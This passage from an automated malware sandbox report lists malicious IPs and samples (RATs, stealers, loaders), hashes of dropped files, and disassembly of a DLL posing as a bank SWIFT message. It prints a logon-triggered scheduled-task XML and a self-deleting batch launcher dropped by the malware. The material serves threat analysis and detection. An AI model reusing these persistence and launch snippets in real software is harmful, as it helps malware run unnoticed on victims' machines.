GMO-Z-COM-THGMO-ZcomNetDesignHoldingsCoLtdSG | https://chilltalk.co.th/sg/societalgenerale/ | malicious | Unknown | 163.44.198.45
SIMPLECARRER2IT | file.exe | malicious | AsyncRAT, VenomRAT | 185.208.158.187
SIMPLECARRER2IT | file.exe | malicious | AsyncRAT, VenomRAT | 185.208.158.187
SIMPLECARRER2IT | lLNOwu1HG4.js | malicious | RHADAMANTHYS | 185.196.8.68
SIMPLECARRER2IT | file.exe | malicious | PureLog Stealer, XWorm | 185.196.8.239
SIMPLECARRER2IT | stail.exe | malicious | Socks5Systemz | 185.208.158.202
SIMPLECARRER2IT | getlab.exe | malicious | Socks5Systemz | 185.208.158.202
SIMPLECARRER2IT | chutmarao.ps1 | malicious | RHADAMANTHYS | 185.196.8.68
SIMPLECARRER2IT | RjygH3Vh7O.exe | malicious | RHADAMANTHYS | 185.196.8.68
SIMPLECARRER2IT | SekpL8Z26C.exe | malicious | Unknown | 185.208.159.79
SIMPLECARRER2IT | file.exe | malicious | Unknown | 185.208.159.79

Match | Associated Sample Name / URL | Detection | Threat Name | Context
a0e9f5d64349fb13191bc781f81f42e1 | Price Quotation-01.dqy.dll | malicious | Snake Keylogger | 163.44.198.57
a0e9f5d64349fb13191bc781f81f42e1 | Z9lFNBiLGK.exe | malicious | DBatLoader | 163.44.198.57
a0e9f5d64349fb13191bc781f81f42e1 | Z9lFNBiLGK.exe | malicious | DBatLoader | 163.44.198.57
a0e9f5d64349fb13191bc781f81f42e1 | https://ytfjghloadv1.b-cdn.net/proCESSINGveriffv001.html | malicious | CAPTCHA Scam ClickFix, LummaC Stealer | 163.44.198.57
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | Amadey, AsyncRAT, Credential Flusher, LummaC Stealer, Stealc, StormKitty, VenomRAT | 163.44.198.57
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 163.44.198.57
a0e9f5d64349fb13191bc781f81f42e1 | nanophanotool.exe | malicious | LummaC Stealer | 163.44.198.57
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar | 163.44.198.57
a0e9f5d64349fb13191bc781f81f42e1 | file.exe | malicious | LummaC Stealer | 163.44.198.57
a0e9f5d64349fb13191bc781f81f42e1 | sjoslin@odeonuk.com_print.svg | malicious | Unknown | 163.44.198.57
                                No context
                                Process:C:\Users\user\AppData\Roaming\regasms.exe
                                File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                Category:dropped
                                Size (bytes):71954
                                Entropy (8bit):7.996617769952133
                                Encrypted:true
                                SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                Malicious:false
                                Process:C:\Users\user\AppData\Roaming\regasms.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):328
                                Entropy (8bit):3.132195944836352
                                Encrypted:false
                                SSDEEP:6:kKBL9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:JiDnLNkPlE99SNxAhUe/3
                                MD5:395847444B6B57B5882C93A7D7C998D5
                                SHA1:D99B9E30A0D42740761D54C86CDBBB382238EE24
                                SHA-256:3922A37049163C712493CEA14A7C6C9BFA1EE02353967F69A00397481EF9AE8A
                                SHA-512:AE9D7F40081B842AE1BE071B95A1ED709DB435736AC892E233C08E65D55F0ADB27B7378E31FB109192EAEDB05F62EF9A75B8C9FF688B4278ED129971AD6A7349
                                Malicious:false
                                Preview:p...... .........^s..K..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                Process:C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1415
                                Entropy (8bit):5.352427679901606
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                MD5:97AD91F1C1F572C945DA12233082171D
                                SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                                Process:C:\Users\user\AppData\Roaming\regasms.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1415
                                Entropy (8bit):5.352427679901606
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPE4KMRaKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPHKMRatHo6hAH4
                                MD5:97AD91F1C1F572C945DA12233082171D
                                SHA1:D5E33DDAB37E32E416FC40419FB26B3C0563519D
                                SHA-256:3F64591E0447E6F5034BC69A8A8D4C7ED36DAC5FE1E408401AE1B98F0D915F7E
                                SHA-512:8FAEED342DADC17571F711DDC1BE67C79A51CA5BD56B5DA13E472ED45FC4EC6F1DC704BA92E81E97F5ECFD73F3D88F9B9CD9AE4EADDF993BFF826627215FBBCE
                                Malicious:false
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data\1b8c564fd69668e6e62d136259980d9e\System.Data.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fc
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:data
                                Category:dropped
                                Size (bytes):2232
                                Entropy (8bit):5.380805901110357
                                Encrypted:false
                                SSDEEP:48:lylWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMugeC/ZPUyus:lGLHyIFKL3IZ2KRH9Oug8s
                                MD5:16AD599332DD2FF94DA0787D71688B62
                                SHA1:02F738694B02E84FFE3BAB7DE5709001823C6E40
                                SHA-256:452876FE504FC0DBEDBD7F8467E94F6E80002DB4572D02C723ABC69F8DF0B367
                                SHA-512:A96158FDFFA424A4AC01220EDC789F3236C03AAA6A7C1A3D8BE62074B4923957E6CFEEB6E8852F9064093E0A290B0E56E4B5504D18113A7983F48D5388CEC747
                                Malicious:false
                                Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                File Type:ASCII text, with no line terminators
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.038920595031593
                                Encrypted:false
                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                Malicious:false
                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                Process:C:\Users\user\AppData\Roaming\regasms.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1608
                                Entropy (8bit):5.125848026435071
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtnxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTxv
                                MD5:325596BA2EC0373F7130E87DB9338492
                                SHA1:5B63F260C4100E68BD1E51775502FD664684D464
                                SHA-256:FF82AF4D9B5188729A552EE381D4DD815D4D56C090970B6A15D5AA14F9D417AE
                                SHA-512:2C6A2101A656ABBF931351514899A80BE7574F4A093C7B21C8ACC41791C93E1DADAF34016CB4C190FF2E4CC7D44E576F4027D14B74A86A85C76B240BF12DD02E
                                Malicious:true
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                Process:C:\Users\user\AppData\Roaming\regasms.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1608
                                Entropy (8bit):5.125848026435071
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtnxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTxv
                                MD5:325596BA2EC0373F7130E87DB9338492
                                SHA1:5B63F260C4100E68BD1E51775502FD664684D464
                                SHA-256:FF82AF4D9B5188729A552EE381D4DD815D4D56C090970B6A15D5AA14F9D417AE
                                SHA-512:2C6A2101A656ABBF931351514899A80BE7574F4A093C7B21C8ACC41791C93E1DADAF34016CB4C190FF2E4CC7D44E576F4027D14B74A86A85C76B240BF12DD02E
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                Process:C:\Users\user\AppData\Roaming\AtkzppDHiyvcIR.exe
                                File Type:XML 1.0 document, ASCII text
                                Category:dropped
                                Size (bytes):1608
                                Entropy (8bit):5.125848026435071
                                Encrypted:false
                                SSDEEP:24:2di4+S2qhH1jy1m4UnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtnxvn:cgeHgYrFdOFzOzN33ODOiDdKrsuTxv
                                MD5:325596BA2EC0373F7130E87DB9338492
                                SHA1:5B63F260C4100E68BD1E51775502FD664684D464
                                SHA-256:FF82AF4D9B5188729A552EE381D4DD815D4D56C090970B6A15D5AA14F9D417AE
                                SHA-512:2C6A2101A656ABBF931351514899A80BE7574F4A093C7B21C8ACC41791C93E1DADAF34016CB4C190FF2E4CC7D44E576F4027D14B74A86A85C76B240BF12DD02E
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>.
                                Process:C:\Users\user\AppData\Roaming\regasms.exe
                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):165
                                Entropy (8bit):5.026708567071967
                                Encrypted:false
                                SSDEEP:3:mKDDCMNqTtvL5o0nacwREaKC5eiBNJovmqRD0nacwRE2J5xAInTRILxLRW1ZPy:hWKqTtT6cNwiaZ5eOovmq1cNwi23fT4N
                                MD5:FEA34DBD27BFB9695B22FA8CD40BB1B4
                                SHA1:FAE60C96B2026D26A5E5046AA0E8FCD893533643
                                SHA-256:0726EAF7358ABA61C2755A01542D5EA9B2611992D9B4FC986785C535D0EEC9CA
                                SHA-512:61CE8A3B8075EB414E2D840C23C36D5B2A2A8528B26A68A9D9C55703EF6F6B5C5DC1E2A6871B026D4288CB29947B4AC337A8D0EEE4894064796C79DF7A8E37FD
                                Malicious:false
                                Preview:@echo off..timeout 3 > NUL..START "" "C:\Users\user\AppData\Roaming\NotepadUpdate.exe"..CD C:\Users\user\AppData\Local\Temp\..DEL "tmpD9E2.tmp.bat" /f /q..
                                Process:C:\Users\user\AppData\Roaming\regasms.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):670216
                                Entropy (8bit):7.434728031470088
                                Encrypted:false
                                SSDEEP:12288:77MfJIBvlbmLC3sCPtRzSXiBdja/z2UmG5pc4M1xK/5BFz2430RUwy9EXX+CNkkR:SIme3LLAiBdMmGpNkspz2i0RUwFOCND
                                MD5:AE806B6F5E02484C2BE2B49DA35B3D26
                                SHA1:66AE8DF94CD9E804FAB01BC6BE77CFEC8D544226
                                SHA-256:7A31E73A61251309C51A343C14AF5149915110C0F818747F7DE78344739F21C5
                                SHA-512:8EA9CFE94BC4DBFC0A6C43B811461E6DA4CAB55FE6A3DDD1A4795F0887B2A311A6E9D9A464BB9253985C5A68CC206C36A703319463E5DACA92ADBE056E16A968
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 26%
                                Process:C:\Users\user\AppData\Roaming\regasms.exe
                                File Type:ASCII text
                                Category:dropped
                                Size (bytes):8
                                Entropy (8bit):2.75
                                Encrypted:false
                                SSDEEP:3:Rt:v
                                MD5:CF759E4C5F14FE3EEC41B87ED756CEA8
                                SHA1:C27C796BB3C2FAC929359563676F4BA1FFADA1F5
                                SHA-256:C9F9F193409217F73CC976AD078C6F8BF65D3AABCF5FAD3E5A47536D47AA6761
                                SHA-512:C7F832AEE13A5EB36D145F35D4464374A9E12FA2017F3C2257442D67483B35A55ECCAE7F7729243350125B37033E075EFBC2303839FD86B81B9B4DCA3626953B
                                Malicious:false
                                Preview:.5.False
                                Process:C:\Windows\System32\rundll32.exe
                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Category:dropped
                                Size (bytes):670216
                                Entropy (8bit):7.434728031470088
                                Encrypted:false
                                SSDEEP:12288:77MfJIBvlbmLC3sCPtRzSXiBdja/z2UmG5pc4M1xK/5BFz2430RUwy9EXX+CNkkR:SIme3LLAiBdMmGpNkspz2i0RUwFOCND
                                MD5:AE806B6F5E02484C2BE2B49DA35B3D26
                                SHA1:66AE8DF94CD9E804FAB01BC6BE77CFEC8D544226
                                SHA-256:7A31E73A61251309C51A343C14AF5149915110C0F818747F7DE78344739F21C5
                                SHA-512:8EA9CFE94BC4DBFC0A6C43B811461E6DA4CAB55FE6A3DDD1A4795F0887B2A311A6E9D9A464BB9253985C5A68CC206C36A703319463E5DACA92ADBE056E16A968
                                Malicious:true
                                Antivirus:
                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                • Antivirus: ReversingLabs, Detection: 26%
                                Process:C:\Windows\SysWOW64\timeout.exe
                                File Type:ASCII text, with CRLF line terminators, with overstriking
                                Category:dropped
                                Size (bytes):60
                                Entropy (8bit):4.41440934524794
                                Encrypted:false
                                SSDEEP:3:hYFqdLGAR+mQRKVxLZXt0sn:hYFqGaNZKsn
                                MD5:3DD7DD37C304E70A7316FE43B69F421F
                                SHA1:A3754CFC33E9CA729444A95E95BCB53384CB51E4
                                SHA-256:4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA
                                SHA-512:713533E973CF0FD359AC7DB22B1399392C86D9FD1E715248F5724AAFBBF0EEB5EAC0289A0E892167EB559BE976C2AD0A0A0D8EFC407FFAF5B3C3A32AA9A0AAA4
                                Malicious:false
                                Preview:..Waiting for 3 seconds, press a key to continue ....2.1.0..
                                File type:MS-DOS executable PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                Entropy (8bit):5.587424394573565
                                TrID:
                                • Win64 Dynamic Link Library (generic) (102004/3) 86.39%
                                • Win64 Executable (generic) (12005/4) 10.17%
                                • Generic Win/DOS Executable (2004/3) 1.70%
                                • DOS Executable Generic (2002/1) 1.70%
                                • VXD Driver (31/22) 0.03%
                                File name:Ziraat Bankasi Swift Mesaji.dqy.dll
                                File size:113'152 bytes
                                MD5:d8debe62cb0e2fee8f1d740ba963cc71
                                SHA1:c1e39bee02a0a141d852921ccd2f0054b8458c58
                                SHA256:f95616ad77ada13b28ccb8cb4627c8f9af26c0bf46470da06e5c109a58ee8492
                                SHA512:5abb0966ad7ade1e9922f20332daf047e60fe2c1529bffa61cc6fbb1e7562d4dc35d3206a6aecc91f8c2a44e66a8dea018cd9043528e87060a2d99862154ab29
                                SSDEEP:1536:9kxzCj2eJKH6lBqJDP4zxdY1jl7LFs9dpZ9KED8miPmJZZT:9kxGSrIQJDoxdgLFAdp1fR
                                TLSH:B9B3E1953B80F4E7DB19027A72A4ED66BEF631B2803749793B40621FD9F17625234F01
                                File Content Preview:MZ......................................................................!..L.!This program cannot be run in DOS mode...$........PE..d.;...Wg........... ...I............Z........./.....................................W.....@................................
                                Icon Hash:7ae282899bbab082
                                Entrypoint:0xe2f135a
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0xe2f0000
                                Subsystem:windows gui
                                Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DLL
                                DLL Characteristics:DYNAMIC_BASE
                                Time Stamp:0x6757D584 [Tue Dec 10 05:45:40 2024 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:
                                OS Version Major:1
                                OS Version Minor:0
                                File Version Major:1
                                File Version Minor:0
                                Subsystem Version Major:1
                                Subsystem Version Minor:0
                                Import Hash:bbd194bfff736fca6517da790c3a91f9
                                Instruction (entry-point disassembly; note that Joe Sandbox decodes this PE32+ image as 32-bit code, so every `dec eax` / `dec ecx` / `dec esp` below is really a 0x48/0x49/0x4C REX prefix, and the runs of one-byte `outsb`, `insb`, `popad` and `add byte ptr` instructions are embedded UTF-16 strings decoded as code. Read in 64-bit mode, the first three lines are `mov rax, 1 ; ret`, an 8-byte DllMain stub that returns TRUE and does nothing else, which matches the exported xlAutoOpen sitting at entry point + 8)
                                dec eax
                                mov eax, 00000001h
                                ret
                                dec eax
                                sub esp, 00001418h
                                call 00007F422CB5F677h
                                imul eax, dword ptr [eax], 65h
                                add byte ptr [edx+00h], dh
                                outsb
                                add byte ptr [ebp+00h], ah
                                insb
                                add byte ptr [ebx], dh
                                add byte ptr [edx], dh
                                add byte ptr [eax], al
                                add byte ptr [ecx-18h], bl
                                jnle 00007F422CB5F666h
                                add byte ptr [eax], al
                                dec eax
                                mov ebx, eax
                                call 00007F422CB5F672h
                                dec esp
                                outsd
                                popad
                                dec esp
                                imul esp, dword ptr [edx+72h], 57797261h
                                add byte ptr [edx+48h], bl
                                mov ecx, ebx
                                call 00007F422CB5FB42h
                                dec ecx
                                mov edi, eax
                                call 00007F422CB5F674h
                                inc edi
                                je 00007F422CB5F6B3h
                                jc 00007F422CB5F6D1h
                                arpl word ptr [ecx+64h], ax
                                jc 00007F422CB5F6C8h
                                jnc 00007F422CB5F6D5h
                                add byte ptr [edx+48h], bl
                                mov ecx, ebx
                                call 00007F422CB5FB22h
                                dec eax
                                mov esi, eax
                                call 00007F422CB5F67Fh
                                inc ebp
                                js 00007F422CB5F6D2h
                                popad
                                outsb
                                inc ebp
                                outsb
                                jbe 00007F422CB5F6CBh
                                jc 00007F422CB5F6D1h
                                outsb
                                insd
                                outsb
                                je 00007F422CB5F6B5h
                                je 00007F422CB5F6D4h
                                imul ebp, dword ptr [esi+67h], 5A005773h
                                dec eax
                                mov ecx, ebx
                                call esi
                                dec ecx
                                mov eax, 00000104h
                                dec eax
                                lea edx, dword ptr [esp+74h]
                                call 00007F422CB5F691h
                                and eax, 50004100h
                                add byte ptr [eax+00h], dl
                                inc esp
                                add byte ptr [ecx+00h], al
                                push esp
                                add byte ptr [ecx+00h], al
                                and eax, 72005C00h
                                add byte ptr [ebp+00h], ah
                                add byte ptr [bx+di+00h], ah
                                jnc 00007F422CB5F662h
                                insd
                                add byte ptr [ebx+00h], dh
                                add byte ptr [ebp+00h], ah
                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3a000 | 0x43 | .edata
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x1000 | 0xafb | .text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x3b000 | 0x8 | .reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x1000 | 0xafb | 0xa00 | da0c0d8d501f646cc8d6096db3634386 | False | 0.487890625 | data | 4.71087358252814 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                .data | 0x2000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                BVOtlE | 0x3000 | 0x1000 | 0x1000 | 6f55f88b76d028233d27a81335c1998d | False | 0.773681640625 | data | 6.779050023884054 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                TZlC | 0x4000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                Nz | 0x5000 | 0x1000 | 0x1000 | 321f5c147a553950f4a8c84cc32d4dee | False | 0.23583984375 | OpenPGP Secret Key | 2.4607384716293943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                O | 0x6000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                VkmH8y1 | 0x7000 | 0x1000 | 0x1000 | 4edfc21db5c9411032ceae22b176542d | False | 0.8701171875 | data | 6.993962551079028 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                wN | 0x8000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                F7SI | 0x9000 | 0x1000 | 0x1000 | 321f5c147a553950f4a8c84cc32d4dee | False | 0.23583984375 | OpenPGP Secret Key | 2.4607384716293943 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                E6qQ | 0xa000 | 0x1000 | 0x1000 | 581e084be9c4bf90a1e21cae3245e74c | False | 0.505615234375 | data | 4.891775390323811 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                Lr | 0xb000 | 0x200 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
